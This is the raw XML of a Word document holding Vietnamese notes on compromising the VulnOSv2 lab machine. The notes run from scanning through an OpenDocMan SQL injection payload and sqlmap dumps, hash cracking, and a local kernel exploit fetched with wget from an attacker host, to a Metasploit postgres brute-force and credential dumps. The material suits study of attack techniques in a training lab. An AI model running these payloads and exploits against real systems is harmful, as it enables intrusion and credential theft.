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D41E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VulnOSv2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4, 2022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9:13 PM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netdiscover -r 192.168.1.0/24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Currently scanning: Finished!   |   Screen View: Unique Hosts                                         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4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                       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_____________________________________________________________________________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IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">            At MAC Address     Count     Len  MAC Vendor / Hostname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-----------------------------------------------------------------------------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192.168.1.1     52:54:00:12:35:00      1      60  Unknown vendor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192.168.1.2     52:54:00:12:35:00      1      60  Unknown vendor                                      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192.168.1.3     08:00:27:98:be:d4      1      60  PCS Systemtechnik GmbH                              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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">13    08:00:27:57:4f:aa      1      60  PCS Systemtechnik GmbH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map -A -T4 -sV -v -p- 192.168.1.13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  STATE SERVICE VERSION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  open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)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ssh-hostkey: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1024 f5:4d:c8:e7:8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)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2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)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256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)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256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)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80/tcp   open  http   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache httpd 2.4.7 ((Ubuntu))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http-methods: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Supported Methods: GET HEAD POST OPTIONS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VulnOSv2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Apache/2.4.7 (Ubuntu)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6667/tcp open  irc     ngircd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 Info: Host: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel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gobuster dir -u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</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>========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Gobuster v3.1.0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OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)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Url:                    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</w:t>
        </w:r>
      </w:hyperlink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Method:       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">           GET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Threads:                 10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Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt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Negative Status codes:   404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User Agent:              gobuster/3.1.0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Timeout:                 10s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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>======================================================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2022/08/03 22:40:28 Starting gobuster in directory enumeration mode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===============================================================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/javascript           (Status: 301) [Size: 316] [--&gt;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http://192.168.1.13/javascript/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]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/server-status        (Status: 403) [Size: 292]                          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===============================================================                                             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2022/08/03 22:41:40 Finished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gg khai thác </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>opendocman, sau đó dùng searchsploit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tìm cách khai thác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/usr/share/exploitdb/exploits/php/webapps/32075.txt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dán payload vào browser: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http://[host]/ajax_udf</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>.php?q=1&amp;add_value=odm_user%20UNION%20SELECT%201,v</w:t>
        </w:r>
      </w:hyperlink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ersion%28%29,3,4,5,6,7,8,9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thành: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</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>?q=1&amp;add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9</w:t>
        </w:r>
      </w:hyperlink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Dùng sqlmap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khai thác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"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 xml:space="preserve">" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-p add_value --dbs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-p: parameter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add_value: paramater m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ẫ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>u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test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[22:56:02] [INFO] fetching database names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available databases [6]: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drupal7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information_schema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jabcd0cs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mysql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performance_schema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phpmyadmin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dump db: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"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>" -p add_value -D jabcd0cs --dump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có th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s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d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 các option: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"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>" -p add_value –threads=4 –columns -T odm_user -D jabcd0cs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“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</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>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>” -p add_value –threads=4 –dump -T odm_user -D jabcd0cs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“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</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>dd_value=odm_user</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>” –threads=4 -D jabcd0cs -T odm_user -C id,username,password –dump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Database: jabcd0cs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Table: odm_user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[2 entries]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+----+--------------------+-------------+----------------------------------+----------+-----------+------------+------------+---------------+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| id | Email              | phone       | password                         | username | last_name | department | f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>irst_name | pw_reset_code |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+----+--------------------+-------------+----------------------------------+----------+-----------+------------+------------+---------------+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1  | webmin@example.com | 5555551212  | b78aae356709f8c31118ea613980954b | webmin   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>| min       | 2          | web        | &lt;blank&gt;       |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2  | guest@example.com  | 555 5555555 | 084e0343a0486ff05530df6c705c8bb4 | guest    | guest     | 2          | guest      | NULL          |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+----+--------------------+-------------+-----------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-----------------+----------+-----------+------------+------------+---------------+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dùng hash-identifider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xác đ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nh lo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encrypt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decrypt password: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https://www.md5online.org/md5-decrypt.html</w:t>
        </w:r>
      </w:hyperlink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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>min1980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(hash = b78aae356709f8c31118ea613980954b)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uname -a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Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux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searchsploit ubuntu 3.13.0 | cut -b 1-150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wget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http://192.168.1.6/37292.c</w:t>
        </w:r>
      </w:hyperlink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--2022-08-04 08:27:16--  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http://192.168.1.6/37292.c</w:t>
        </w:r>
      </w:hyperlink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 192.168.1.6:80... connected.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request sent, awaiting response... 200 OK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Length: 4968 (4.9K) [text/x-csrc]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to: ‘37292.c’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100%[==========================================================================&gt;] 4,968       --.-K/s   in 0.001s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2022-08-04 08:27:16 (4.85 MB/s) - ‘37292.c’ saved [4968/4968]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ls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37292.c  post.tar.gz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gcc 37292.c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ls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37292.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>c  a.out  post.tar.gz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a.out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-sh: 9: a.out: not found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./a.out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spawning threads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mount #1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mount #2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child threads done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/etc/ld.so.preload created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shared library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whoami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m quy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n user khác khi chưa có root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root@VulnOSv2:/home/webmin# tar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> xzvf post.tar.gz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root@VulnOSv2:/home/webmin# netstat -tulpn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 Internet connections (only servers)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Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name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  0      0 127.0.0.1:3306          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">0.0.0.0:*               LISTEN      1029/mysqld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  0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      1151/ngircd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  0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      968/sshd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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      1051/postgres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tcp6       0      0 :::6667                 :::*                    LISTEN      1151/ngircd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tcp6       0      0 :::80                   :::*                    LIS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TEN      1239/apache2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tcp6       0      0 :::22                   :::*                    LISTEN      968/sshd    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tcp6       0      0 ::1:5432                :::*                    LISTEN      1051/postgres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udp        0      0 0.0.0.0:68      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        0.0.0.0:*                           765/dhclient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udp        0      0 0.0.0.0:50169           0.0.0.0:*                           765/dhclient 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udp6       0      0 :::1818                 :::*                                765/dhclient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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> forwarding postgres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webmin@192.168.1.13 -L 5432:localhost:5432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bruteforce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msfconsole -q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use auxiliary/scanner/postgres/postgres_login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auxiliary(scanner/postgres/postgres_login) &gt; set RHOSTS 127.0.0.1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RHOSTS =&gt; 127.0.0.1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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nner/postgres/postgres_login) &gt; run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[!] No active DB -- Credential data will not be saved!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:tiger@template1 (Incorrect: Invalid us</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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:postgres@template1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:password@template1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:admin@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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postgres:@template1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postgres:tiger@template1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127.0.0.1:5432 - Login Successful: postgres:postgres@template1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scott:tiger@template1 (Incorrect: Invalid username or passwo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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scott:postgres@template1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scott:password@template1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scott:admin@t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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admin:tiger@template1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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1:5432 - LOGIN FAILED: admin:postgres@template1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admin:password@template1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admin:admin@template1 (Incorr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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admin:admin@template1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admin:password@template1 (Incorrect: Invalid username or password)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Scanned 1 of 1 h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>osts (100% complete)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Auxiliary module execution completed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msf6 auxiliary(scanner/postgres/postgres_login) &gt;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dump db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PGPASSWORD="postgres" pg_dumpall -U postgres -h localhost -p 5432   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vulnosadmin     c4nuh4ckm3tw1c3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đăng nh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 xml:space="preserve">p ssh vào tài </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>kho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n m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vulnosadmin@VulnOSv2:~$ ls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r00t.blend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vulnosadmin@VulnOSv2:~$ pwd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/home/vulnosadmin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file v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 xml:space="preserve"> máy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scp vulnosadmin@192.168.1.13:/home/vulnosadmin/r00t.blend /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cài blender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m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ở</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> file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apt-get install blender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 có m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t kh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ẩ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>u root:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="002D4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ab12fg//drg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E3"/>
    <w:rsid w:val="002D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2EA74-542E-4FBD-A8B8-B6476335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3/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_us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[host]/ajax_udf.php?q=1&amp;add_value=odm_user%20UNION%20SELECT%201,v" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_us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92.168.1.6/37292.c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.13/javascript/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.13/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.6/37292.c" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.13/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.md5online.org/md5-decry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1689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2023-06-13T06:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-13T06:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>